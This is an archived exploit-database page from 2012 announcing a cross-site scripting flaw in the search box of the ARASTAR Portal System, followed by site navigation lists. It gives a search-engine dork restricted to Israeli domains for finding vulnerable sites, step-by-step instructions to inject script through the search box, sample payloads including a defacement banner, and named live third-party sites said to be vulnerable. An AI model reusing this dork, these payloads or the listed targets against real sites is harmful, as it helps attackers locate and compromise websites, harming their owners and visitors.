ARASTAR Portal System Cross Site Scripting

ARASTAR Portal System Cross Site Scripting: Posted Jan 14, 2012; Authored by ITTIHACK; ARASTAR Portal System suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 32fe953c4b69bbc4c887b2a46cb5fe2901ad4a8a9a4c445c453cef140d62e1b6; Download | Favorite | View

ARASTAR Portal System Cross Site Scripting

ARASTAR Portal System (search.php) XSS  Vulnerability

       Software : ARASTAR                                                                    
       Date     : 1/13/2012                                             
       Vendor   : http://www.ara-star.com               
     Get App. : http://www.ara-star.com/sale.php?sale=3      
       Price    : $480                                                   
       Dork     : site:*.il intext:"powered by ARASTAR"                                     
       Author   : ITTIHACK                                                      
       Home     : http://ittihack.com                                                            
     
                                                                                                                        
Vulnerable File : Search.php

Exploit         : Use the dork above to find yours, go to the home page and post XSS code in (( search box ))
                  Note; do not post it in the URL above, just in search box
               
Examples        : <script>alert(1337)</script>
                  <center><h1> Found By ITTIHACK </h1></center>

                                                                                              
Demo Sites:       http://radio.ara-star.com  <-- Supporter
                  http://aljalel.co.il
                  http://alwan.co.il
                  

           
 
                            #Greatz to: ___    ____    ____
                            #````______/```\__//```\__/____\
                            #``_/```\_/``:```````````//____\
                            #`/|``````:``:``..``````/ Reinie \  
                            #|`|`````::`````::``````\````````/
                            #|`|`````:|`````||`````\`\______/
                            #|`|`````||`````||``````|\``/``|
                            #`\|`````||`````||``````|```/`|`\    
                            #``|`````||`````||``````|``/`/_\`\
                            #``|`___`||`___`||``````|`/``/````\
                            #```\_-_/``\_-_/`|`____`|/__/``````\
                            #````````````````_\_--_/````\`````/  
                            #```````````````/____```````````/
                            #``````````````/`````\`````````/
                            #``````````````\______\_______/

Top Authors In Last 30 Days

Red Hat 267 files
indoushka 178 files
Jay Turla 150 files
Ubuntu 74 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 24 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,591)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,312)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,885)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,861)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

ARASTAR Portal System Cross Site Scripting

ARASTAR Portal System Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ARASTAR Portal System Cross Site Scripting

Share This

ARASTAR Portal System Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems